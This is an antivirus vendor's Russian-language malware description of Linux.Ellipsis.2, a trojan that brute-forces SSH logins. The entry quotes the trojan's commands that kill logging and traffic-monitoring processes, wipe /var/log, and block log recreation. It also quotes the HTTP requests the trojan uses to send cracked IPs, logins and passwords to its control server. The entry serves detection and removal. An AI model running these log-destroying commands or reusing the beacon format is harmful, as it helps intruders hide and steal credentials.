Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Linux.Ellipsis.2

Добавлен в вирусную базу Dr.Web: 2015-09-10

Описание добавлено:

SHA1:

  • c93957405ed43d8cca936dcf9a894a82fa10a518 (unpacked)
  • 8b34e16d1542766d7c09472dfa23a69a0e1c13ce (UPX)

Троянская программа, угрожающая устройствам под управлением ОС Linux, предназначенная для взлома различных сетевых устройств и компьютеров по протоколу SSH методом грубой силы (брутфорс). После установки и запуска принимает один входной аргумент:

auto:zzz.ccc.vvv.bbb

где zzz.ccc.vvv.bbb - IP-адрес управляющего сервера.

В процессе инициализации троянец удаляет свой рабочий каталог ("/tmp/.../") и очищает правила для iptables. Затем он завершает различные приложения, в том числе программы для ведения и просмотра логов, анализа трафика:

killall syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
killall -9 syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
kill -9 `pidof syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump`

После этого троянец удаляет существующие файлы журналов по маскам "/var/log/*" и "/disk/*log*". На их месте, с целью предотвращения создания файловых объектов с такими же именами в будущем, создает следующие каталоги:

mkdir /var/log/all.log /var/log/auth.log /var/log/messages /var/log/secure /var/log/everything.log /var/log/messages.log /disk/all.log /disk/auth.log /disk/messages /disk/secure /disk/everything.log /disk/messages.log

Затем троянец получает из /proc/cpuinfo значение частоты процессора, указанное в параметре "bogomips", и на его основе устанавливает количество потоков сканирования и ssh-подключений.

Вслед за этим троянец обращается за получением задания к управляющему серверу, адрес которого он принимает в качестве входного аргумента при запуске. Получаемое троянцем с управляющего сервера задание содержит IP-адрес подсети, которую вредоносная программа сканирует на наличие устройств с открытым SSH-подключением на порту 22. При обнаружении таких устройств троянец пытается получить к ним доступ, перебирая пары логин-пароль по имеющемуся у него словарю, а в случае успеха отправляет сообщение об этом на сервер злоумышленников:

GET /auto.cgi?root=yes&ip=%s&l=%s&p=%s HTTP/1.0\nUser-Agent:
Mozilla\nAccept-Language: en\nHost: auto\nCopyright: 2005 by RS from
Romania Hello World Microsoft Sucks Bill Gates Must die\n\n

где ip – IP-адрес узла, к которому удалось получить доступ, l - логин, p – пароль.

В отдельном потоке троянец с интервалом в минуту отсылает на управляющий сервер запрос следующего вида:

GET
/auto.cgi?report=yes&finish=%d&net=%s&seconds=%d&open=%d&rootcount=%d&s
shspeed=%d&totalssh=%d&ssherrors=%d&totalscan=%d&scanmax=%d&sshmax=%d
HTTP/1.0\nUser-Agent: Mozilla\nAccept-Language: en\nHost:
auto\nCopyright: 2005 by RS from Romania Hello World Microsoft Sucks
Bill Gates Must die\n\n

При этом значение finish равно нулю. После завершения сканирования троянец отправляет 10 аналогичных запросов с интервалом в 1 секунду с параметром finish, равным единице.

Параметр net содержит IP-адрес подсети, которую троянец сканирует в настоящее время.

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру